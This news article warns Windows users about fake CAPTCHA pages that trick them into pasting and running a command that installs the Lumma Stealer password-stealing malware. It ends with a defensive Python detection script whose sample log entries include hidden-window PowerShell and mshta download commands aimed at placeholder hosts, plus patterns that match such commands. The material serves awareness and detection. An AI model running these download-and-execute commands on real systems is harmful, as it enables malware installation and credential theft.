With password theft firmly in threat actors’ crosshairs, and cybercriminals devising ever more cunning ways to carry it out, this latest warning from security experts should be taken very seriously by Windows users. Those CAPTCHA tests to prove you are human and not a bot are not only annoying as heck, but they can be dangerous. Here’s why you must not complete this particular CAPTCHA test if it is presented to you.
What You Need To Know About These Dangerous CAPTCHA Tests
The use of CAPTCHA tests (it stands for Completely Automated Public Turing test to tell Computers and Humans Apart, in case you wondered) by threat actors is not new; on Oct. 26, 2024, I reported on how a Russian hacking group was targeting Ukrainian victims using a malicious version of the Google reCAPTCHA “I am not a robot” dialog.
At the time, I said that technology such as Apple’s server-based automatic verification system, which lets iOS users bypass completing CAPTCHA tests manually, along with a propensity towards using browser extensions that also help to defeat the things, meant that fewer are seen day to day. The problem is that fewer and none are not the same thing, and when confronted with a CAPTCHA we are likely more inclined to complete it as quickly as possible and move on to wherever we were trying to get. Especially when you consider that the anti-bot mechanism itself, partly because it isn’t seen so often now, has become cloaked in even more trust than when we faced them every five minutes.
The Latest CAPTCHA Test Attack Warning
The latest warning comes from Leandro Fróes, a senior threat research engineer with Netskope Threat Labs, and confirms a new threat campaign that is delivering the Lumma Stealer malware, which is capable of grabbing your passwords and other sensitive data. “The campaign is global,” Fróes said, targeting victims in “Argentina, Colombia, the United States, the Philippines, and other countries around the world.” It also doesn’t care much about the industry sector being attacked, with healthcare, banking, marketing and telecoms all in the crosshairs so far.
The key findings of the Netskope Threat Labs report were:
- The new Lumma Stealer campaign uses fake CAPTCHAs across multiple new websites, relying on malvertising and several new evasion techniques to target Windows users worldwide.
- The infection chain itself, initiated by the fake CAPTCHA instructions, requires the victim to execute a command from their clipboard using the Windows Run command. Because the malicious command runs outside the browser, browser-based defenses have very little chance to flag it as malicious.
Mitigating The Windows CAPTCHA Malware Threat
In the current campaign, the fake CAPTCHA instructs the user to open the Windows Run window by pressing Windows+R, paste the clipboard’s content into the Run window using CTRL+V, and then press ENTER to execute it. “This specific sequence is essential for the successful execution of the next stage,” Fróes said, “and it only works in Windows environments.” Which brings me to the most obvious mitigation: ask yourself when you have ever been asked to do something like that before in order to complete a CAPTCHA. Seriously, don’t be that trusting. Not all threats require sophisticated AI-driven attack methods; most still rely on plain trickery to get you infected. Take your time, think about what you are being asked to do, and make a sensible decision.
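For defenders, the Windows+R, CTRL+V, ENTER sequence described above leaves a recognisable shape in process-creation telemetry: whatever is pasted into the Run dialog is launched by explorer.exe, so a script interpreter or similar utility appearing as a child of explorer.exe with a command line that reaches out to a URL, hides its window or carries an encoded payload is worth a closer look. The following Python script is an added example of that hunting logic; it is not code from the Netskope report or this article. The flattened log format, the sample event lines, the interpreter list and the indicator regexes are all assumptions constructed for the illustration, and the domains use the reserved .invalid TLD.

```python
import re
from typing import Dict, List

# Constructed sample telemetry in the style of Sysmon Event ID 1 (process
# creation), flattened to one "Key=Value; Key=Value" line per event. These
# records are made up for this example, not logs from the Netskope report
# or from any real host.
SAMPLE_EVENTS = [
    # Ordinary Run-dialog use: explorer.exe launching Notepad.
    "Image=C:\\Windows\\System32\\notepad.exe; "
    "ParentImage=C:\\Windows\\explorer.exe; CommandLine=notepad.exe",
    # An interpreter launched from Run, but nothing suspicious on the line.
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe; "
    "ParentImage=C:\\Windows\\explorer.exe; "
    "CommandLine=powershell.exe -NoProfile Get-Date",
    # Interpreter from Run that fetches a remote resource.
    "Image=C:\\Windows\\System32\\mshta.exe; "
    "ParentImage=C:\\Windows\\explorer.exe; "
    "CommandLine=mshta https://example.invalid/placeholder",
    # Interpreter from Run with a hidden window and a download cradle.
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe; "
    "ParentImage=C:\\Windows\\explorer.exe; "
    "CommandLine=powershell -w hidden -c iwr http://example.invalid/placeholder",
    # Same kind of command line but spawned by cmd.exe: not the Run-dialog
    # shape this rule targets, so it is left for other rules to cover.
    "Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe; "
    "ParentImage=C:\\Windows\\System32\\cmd.exe; "
    "CommandLine=powershell -c iwr http://example.invalid/placeholder",
]

# Binaries that commonly act as the first stage when a pasted command runs
# (assumed list; tune it to your environment).
INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe",
}

# Command-line traits a person typing into Run almost never produces
# (assumed heuristics, not signatures from the report).
CMDLINE_INDICATORS = [
    ("remote_url", re.compile(r"https?://", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("encoded_command",
     re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle",
     re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|invoke-expression|iex)\b",
                re.I)),
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one flattened 'Key=Value; Key=Value' record into a dict.

    Real pipelines should read the structured (XML/JSON) event instead; this
    splitter exists only to feed the constructed sample lines above.
    """
    event: Dict[str, str] = {}
    for field in line.split("; "):
        key, _, value = field.partition("=")
        event[key.strip()] = value.strip()
    return event


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def assess(event: Dict[str, str]) -> List[str]:
    """Return the indicator names that fire for one event.

    The rule fires only for the Run-dialog shape: explorer.exe as the parent,
    an interpreter as the child, and at least one suspicious command-line
    trait. An empty list means this rule does not flag the event.
    """
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(event.get("Image", "")) not in INTERPRETERS:
        return []
    cmdline = event.get("CommandLine", "")
    return [name for name, pat in CMDLINE_INDICATORS if pat.search(cmdline)]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run the rule over flattened event lines and collect the hits."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        indicators = assess(event)
        if indicators:
            findings.append({
                "image": basename(event["Image"]),
                "indicators": indicators,
                "command_line": event.get("CommandLine", ""),
            })
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"{hit['image']}: {', '.join(hit['indicators'])}  <- {hit['command_line']}")
```

Requiring explorer.exe as the parent keeps the rule narrow enough to avoid drowning in the interpreter launches that administrators and scheduled tasks produce all day, and the Get-Date sample shows that merely opening PowerShell from Run is not flagged on its own. Where the Run dialog is not needed at all for a user population, the same class of attack can also be blunted by disabling it through the existing Explorer Group Policy setting that removes the Run command from the Start menu, with the detection rule kept in place for the machines that must retain it.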